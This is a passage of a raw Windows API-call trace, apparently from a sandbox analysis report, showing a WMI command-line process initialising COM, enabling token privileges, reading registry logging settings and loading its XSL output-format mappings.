0xa5f370 [0297.406] _onexit (_Func=0xa5f380) returned 0xa5f380 [0297.406] _onexit (_Func=0xa5f390) returned 0xa5f390 [0297.406] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0297.406] ResolveDelayLoadedAPI () returned 0x74a22590 [0297.407] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0297.412] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0297.423] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x6148b8) returned 0x0 [0297.451] GetCurrentProcess () returned 0xffffffff [0297.451] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x19f9e8 | out: TokenHandle=0x19f9e8*=0x194) returned 1 [0297.451] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19f9e4 | out: TokenInformation=0x0, ReturnLength=0x19f9e4) returned 0 [0297.451] malloc (_Size=0x118) returned 0x7826b0 [0297.451] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x7826b0, TokenInformationLength=0x118, ReturnLength=0x19f9e4 | out: TokenInformation=0x7826b0, ReturnLength=0x19f9e4) returned 1 [0297.451] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x7826b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0297.451] free (_Block=0x7826b0) [0297.451] CloseHandle (hObject=0x194) returned 1 [0297.451] malloc (_Size=0x40) returned 0x7826b0 [0297.451] malloc (_Size=0x40) returned 0x7826f8 [0297.451] malloc (_Size=0x40) returned 0x782740 [0297.451] SetThreadUILanguage (LangId=0x0) returned 0x3b0409 [0297.456] _vsnwprintf (in: _Buffer=0x782740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x19f970 | out: _Buffer="ms_409") returned 6 [0297.456] malloc (_Size=0x20) returned 0x781200 [0297.456] GetComputerNameW (in: lpBuffer=0x781200, nSize=0x19f9d4 | out: lpBuffer="NQDPDE", nSize=0x19f9d4) returned 1 [0297.456] lstrlenW (lpString="NQDPDE") returned 6 [0297.456] malloc (_Size=0xe) returned 0x782788 [0297.456] lstrlenW (lpString="NQDPDE") returned 6 [0297.456] ResolveDelayLoadedAPI () returned 0x7444db00 [0297.457] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x19f9e8 | out: lpNameBuffer=0x0, nSize=0x19f9e8) returned 0x3b1000 [0297.458] GetLastError () returned 0xea [0297.458] malloc (_Size=0x1e) returned 0x7827a0 [0297.458] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x7827a0, nSize=0x19f9e8 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x19f9e8) returned 0x1 [0297.459] lstrlenW (lpString="") returned 0 [0297.459] lstrlenW (lpString="NQDPDE") returned 6 [0297.459] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0297.461] lstrlenW (lpString=".") returned 1 [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0297.461] lstrlenW (lpString="LOCALHOST") returned 9 [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0297.461] free (_Block=0x782788) [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] malloc (_Size=0xe) returned 0x782788 [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] malloc (_Size=0xe) returned 0x7827c8 [0297.461] lstrlenW (lpString="NQDPDE") returned 6 [0297.461] malloc (_Size=0x4) returned 0x7827e0 [0297.461] malloc (_Size=0xc) returned 0x7827f0 [0297.461] ResolveDelayLoadedAPI () returned 0x7745b870 [0297.472] malloc (_Size=0x18) returned 0x782808 [0297.472] malloc (_Size=0xc) returned 0x782828 [0297.472] SysStringLen (param_1="IDENTIFY") returned 0x8 [0297.472] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0297.472] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0297.472] SysStringLen (param_1="IDENTIFY") returned 0x8 [0297.472] malloc (_Size=0x18) returned 0x782840 [0297.472] malloc (_Size=0xc) returned 0x782860 [0297.472] SysStringLen (param_1="IMPERSONATE") returned 0xb [0297.472] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0297.472] SysStringLen (param_1="IMPERSONATE") returned 0xb [0297.472] SysStringLen (param_1="IDENTIFY") returned 0x8 [0297.472] SysStringLen (param_1="IDENTIFY") returned 0x8 [0297.472] SysStringLen (param_1="IMPERSONATE") returned 0xb [0297.472] malloc (_Size=0x18) returned 0x782878 [0297.472] malloc (_Size=0xc) returned 0x782898 [0297.472] SysStringLen (param_1="DELEGATE") returned 0x8 [0297.472] SysStringLen (param_1="IDENTIFY") returned 0x8 [0297.472] SysStringLen (param_1="DELEGATE") returned 0x8 [0297.472] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0297.472] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0297.472] SysStringLen (param_1="DELEGATE") returned 0x8 [0297.472] malloc (_Size=0x18) returned 0x7828b0 [0297.472] malloc (_Size=0xc) returned 0x7828d0 [0297.472] malloc (_Size=0x18) returned 0x7828e8 [0297.473] malloc (_Size=0xc) returned 0x782908 [0297.473] SysStringLen (param_1="NONE") returned 0x4 [0297.473] SysStringLen (param_1="DEFAULT") returned 0x7 [0297.473] SysStringLen (param_1="DEFAULT") returned 0x7 [0297.473] SysStringLen (param_1="NONE") returned 0x4 [0297.473] malloc (_Size=0x18) returned 0x782920 [0297.473] malloc (_Size=0xc) returned 0x782940 [0297.473] SysStringLen (param_1="CONNECT") returned 0x7 [0297.473] SysStringLen (param_1="DEFAULT") returned 0x7 [0297.473] malloc (_Size=0x18) returned 0x782958 [0297.473] malloc (_Size=0xc) returned 0x7804a0 [0297.473] SysStringLen (param_1="CALL") returned 0x4 [0297.474] SysStringLen (param_1="DEFAULT") returned 0x7 [0297.474] SysStringLen (param_1="CALL") returned 0x4 [0297.474] SysStringLen (param_1="CONNECT") returned 0x7 [0297.474] malloc (_Size=0x18) returned 0x7804b8 [0297.474] malloc (_Size=0xc) returned 0x7804d8 [0297.474] SysStringLen (param_1="PKT") returned 0x3 [0297.474] SysStringLen (param_1="DEFAULT") returned 0x7 [0297.474] SysStringLen (param_1="PKT") returned 0x3 [0297.474] SysStringLen (param_1="NONE") returned 0x4 [0297.474] SysStringLen (param_1="NONE") returned 0x4 [0297.474] SysStringLen (param_1="PKT") returned 0x3 [0297.474] malloc (_Size=0x18) returned 0x782a80 [0297.474] malloc (_Size=0xc) returned 0x7804f0 [0297.474] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0297.474] SysStringLen (param_1="DEFAULT") returned 0x7 [0297.474] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0297.474] SysStringLen (param_1="NONE") returned 0x4 [0297.474] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0297.474] SysStringLen (param_1="PKT") returned 0x3 [0297.474] SysStringLen (param_1="PKT") returned 0x3 [0297.474] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0297.474] malloc (_Size=0x18) returned 0x782b00 [0297.474] malloc (_Size=0xc) returned 0x780508 [0297.474] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0297.474] SysStringLen (param_1="DEFAULT") returned 0x7 [0297.474] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0297.474] SysStringLen (param_1="PKT") returned 0x3 [0297.474] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0297.475] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0297.475] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0297.475] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0297.475] malloc (_Size=0x18) returned 0x782ba0 [0297.475] malloc (_Size=0x40) returned 0x780520 [0297.475] malloc (_Size=0x20a) returned 0x7897c8 [0297.475] GetSystemDirectoryW (in: lpBuffer=0x7897c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0297.475] free (_Block=0x7897c8) [0297.475] malloc (_Size=0xc) returned 0x780568 [0297.475] malloc (_Size=0xc) returned 0x780580 [0297.475] malloc (_Size=0xc) returned 0x782d80 [0297.475] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0297.475] SysStringLen (param_1="\\wbem\\") returned 0x6 [0297.475] free (_Block=0x780568) [0297.475] free (_Block=0x780580) [0297.475] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0297.475] free (_Block=0x782d80) [0297.476] malloc (_Size=0xc) returned 0x7898e0 [0297.476] malloc (_Size=0xc) returned 0x7898b0 [0297.476] malloc (_Size=0xc) returned 0x789988 [0297.476] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0297.476] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0297.476] free (_Block=0x7898e0) [0297.476] free (_Block=0x7898b0) [0297.476] GetCurrentThreadId () returned 0x115c [0297.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x19f4f8 | out: phkResult=0x19f4f8*=0x1a0) returned 0x0 [0297.476] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x19f504, lpcbData=0x19f500*=0x400 | out: lpType=0x0, lpData=0x19f504*=0x30, lpcbData=0x19f500*=0x4) returned 0x0 [0297.476] _wcsicmp (_String1="0", _String2="1") returned -1 [0297.476] _wcsicmp (_String1="0", _String2="2") returned -2 [0297.476] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x19f500*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x19f500*=0x42) returned 0x0 [0297.476] malloc (_Size=0x86) returned 0x782d80 [0297.476] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x782d80, lpcbData=0x19f500*=0x42 | out: lpType=0x0, lpData=0x782d80*=0x25, lpcbData=0x19f500*=0x42) returned 0x0 [0297.477] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0297.477] malloc (_Size=0x42) returned 0x782e10 [0297.477] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0297.477] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x19f504, lpcbData=0x19f500*=0x400 | out: lpType=0x0, lpData=0x19f504*=0x36, lpcbData=0x19f500*=0xc) returned 0x0 [0297.477] _wtol (_String="65536") returned 65536 [0297.477] free (_Block=0x782d80) [0297.477] RegCloseKey (hKey=0x0) returned 0x6 [0297.477] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x19f994 | out: ppv=0x19f994*=0x5a45a8) returned 0x0 [0297.498] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x5a45a8, xmlSource=0x19f918*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x19f980 | out: isSuccessful=0x19f980*=0xffff) returned 0x0 [0297.699] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x5a45a8, DOMElement=0x19f990 | out: DOMElement=0x19f990*=0x5a6b48) returned 0x0 [0297.700] malloc (_Size=0xc) returned 0x7897f0 [0297.700] IXMLDOMElement:getElementsByTagName (in: This=0x5a6b48, tagName="XSLFORMAT", resultList=0x19f98c | out: resultList=0x19f98c*=0x5a9ca0) returned 0x0 [0297.702] free (_Block=0x7897f0) [0297.702] IXMLDOMNodeList:get_length (in: This=0x5a9ca0, listLength=0x19f988 | out: listLength=0x19f988*=21) returned 0x0 [0297.702] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=0, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.703] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="texttable.xsl") returned 0x0 [0297.703] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.703] malloc (_Size=0xc) returned 0x789898 [0297.703] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.703] free (_Block=0x789898) [0297.703] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0297.703] malloc (_Size=0xc) returned 0x789898 [0297.704] malloc (_Size=0xc) returned 0x789940 [0297.704] malloc (_Size=0x18) returned 0x782ac0 [0297.704] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.704] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.704] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.704] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=1, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.704] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="textvaluelist.xsl") returned 0x0 [0297.704] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.704] malloc (_Size=0xc) returned 0x789820 [0297.704] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.704] free (_Block=0x789820) [0297.705] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0297.705] malloc (_Size=0xc) returned 0x7898b0 [0297.705] malloc (_Size=0xc) returned 0x789850 [0297.705] SysStringLen (param_1="VALUE") returned 0x5 [0297.705] SysStringLen (param_1="TABLE") returned 0x5 [0297.705] SysStringLen (param_1="TABLE") returned 0x5 [0297.705] SysStringLen (param_1="VALUE") returned 0x5 [0297.705] malloc (_Size=0x18) returned 0x782d20 [0297.705] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.705] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.705] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.705] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=2, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.705] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="textvaluelist.xsl") returned 0x0 [0297.705] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.705] malloc (_Size=0xc) returned 0x789880 [0297.706] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.706] free (_Block=0x789880) [0297.706] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0297.706] malloc (_Size=0xc) returned 0x789928 [0297.706] malloc (_Size=0xc) returned 0x789958 [0297.706] SysStringLen (param_1="LIST") returned 0x4 [0297.706] SysStringLen (param_1="TABLE") returned 0x5 [0297.706] malloc (_Size=0x18) returned 0x7829e0 [0297.706] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.706] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.706] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.706] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=3, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.706] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="rawxml.xsl") returned 0x0 [0297.707] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.707] malloc (_Size=0xc) returned 0x789820 [0297.707] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.707] free (_Block=0x789820) [0297.707] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0297.707] malloc (_Size=0xc) returned 0x789970 [0297.707] malloc (_Size=0xc) returned 0x789820 [0297.707] SysStringLen (param_1="RAWXML") returned 0x6 [0297.707] SysStringLen (param_1="TABLE") returned 0x5 [0297.707] SysStringLen (param_1="RAWXML") returned 0x6 [0297.707] SysStringLen (param_1="LIST") returned 0x4 [0297.707] SysStringLen (param_1="LIST") returned 0x4 [0297.707] SysStringLen (param_1="RAWXML") returned 0x6 [0297.707] malloc (_Size=0x18) returned 0x782a20 [0297.707] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.708] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.708] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.708] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=4, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.708] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="htable.xsl") returned 0x0 [0297.708] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.708] malloc (_Size=0xc) returned 0x7899a0 [0297.708] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.708] free (_Block=0x7899a0) [0297.708] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0297.708] malloc (_Size=0xc) returned 0x7898f8 [0297.708] malloc (_Size=0xc) returned 0x789910 [0297.708] SysStringLen (param_1="HTABLE") returned 0x6 [0297.708] SysStringLen (param_1="TABLE") returned 0x5 [0297.708] SysStringLen (param_1="HTABLE") returned 0x6 [0297.709] SysStringLen (param_1="LIST") returned 0x4 [0297.709] malloc (_Size=0x18) returned 0x782c20 [0297.709] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.709] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.709] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.709] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=5, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.709] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="hform.xsl") returned 0x0 [0297.709] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.709] malloc (_Size=0xc) returned 0x789868 [0297.709] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.709] free (_Block=0x789868) [0297.709] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0297.710] malloc (_Size=0xc) returned 0x7899a0 [0297.710] malloc (_Size=0xc) returned 0x7898c8 [0297.710] SysStringLen (param_1="HFORM") returned 0x5 [0297.710] SysStringLen (param_1="TABLE") returned 0x5 [0297.710] SysStringLen (param_1="HFORM") returned 0x5 [0297.710] SysStringLen (param_1="LIST") returned 0x4 [0297.710] SysStringLen (param_1="HFORM") returned 0x5 [0297.710] SysStringLen (param_1="HTABLE") returned 0x6 [0297.710] malloc (_Size=0x18) returned 0x782c80 [0297.710] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.710] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.710] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.710] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=6, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.710] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="xml.xsl") returned 0x0 [0297.710] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.710] malloc (_Size=0xc) returned 0x7899b8 [0297.711] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.711] free (_Block=0x7899b8) [0297.711] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0297.711] malloc (_Size=0xc) returned 0x7899b8 [0297.711] malloc (_Size=0xc) returned 0x7898e0 [0297.711] SysStringLen (param_1="XML") returned 0x3 [0297.711] SysStringLen (param_1="TABLE") returned 0x5 [0297.711] SysStringLen (param_1="XML") returned 0x3 [0297.711] SysStringLen (param_1="VALUE") returned 0x5 [0297.711] SysStringLen (param_1="VALUE") returned 0x5 [0297.711] SysStringLen (param_1="XML") returned 0x3 [0297.711] malloc (_Size=0x18) returned 0x782ae0 [0297.711] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.711] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.711] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.711] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=7, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.712] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="mof.xsl") returned 0x0 [0297.712] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.712] malloc (_Size=0xc) returned 0x7897f0 [0297.712] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.712] free (_Block=0x7897f0) [0297.712] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0297.712] malloc (_Size=0xc) returned 0x789838 [0297.712] malloc (_Size=0xc) returned 0x789868 [0297.712] SysStringLen (param_1="MOF") returned 0x3 [0297.712] SysStringLen (param_1="TABLE") returned 0x5 [0297.712] SysStringLen (param_1="MOF") returned 0x3 [0297.712] SysStringLen (param_1="LIST") returned 0x4 [0297.712] SysStringLen (param_1="MOF") returned 0x3 [0297.712] SysStringLen (param_1="RAWXML") returned 0x6 [0297.712] SysStringLen (param_1="LIST") returned 0x4 [0297.713] SysStringLen (param_1="MOF") returned 0x3 [0297.713] malloc (_Size=0x18) returned 0x782be0 [0297.713] IUnknown:Release (This=0x5a6b88) returned 0x0 [0297.713] IUnknown:Release (This=0x5a9fa8) returned 0x0 [0297.713] IUnknown:Release (This=0x5a9ff8) returned 0x0 [0297.713] IXMLDOMNodeList:get_item (in: This=0x5a9ca0, index=8, listItem=0x19f9a8 | out: listItem=0x19f9a8*=0x5a6b88) returned 0x0 [0297.713] IXMLDOMNode:get_text (in: This=0x5a6b88, text=0x19f9ac | out: text=0x19f9ac*="csv.xsl") returned 0x0 [0297.713] IXMLDOMNode:get_attributes (in: This=0x5a6b88, attributeMap=0x19f9a4 | out: attributeMap=0x19f9a4*=0x5a9fa8) returned 0x0 [0297.713] malloc (_Size=0xc) returned 0x7897f0 [0297.713] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x5a9fa8, name="KEYWORD", namedItem=0x19f9a0 | out: namedItem=0x19f9a0*=0x5a9ff8) returned 0x0 [0297.713] free (_Block=0x7897f0) [0297.713] IXMLDOMNode:get_nodeValue (in: This=0x5a9ff8, value=0x19f960 | out: value=0x19f960*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0297.713] malloc (_Size=0xc) returned 0x789880 [0297.714] malloc (_Size=0xc) returned 0x789808 [0297.714] SysStringLen (param_1="CSV") returned 0x3 [0297.714] SysStringLen (param_1="TABLE") returned 0x5 [0297.714] SysStringLen (param_1="CSV") returned 0x3 [0297.714] SysStringLen (param_1="LIST") returned 0x4 [0297.714] SysStringLen (param_1="CSV") returned 0x3 [0297.714] 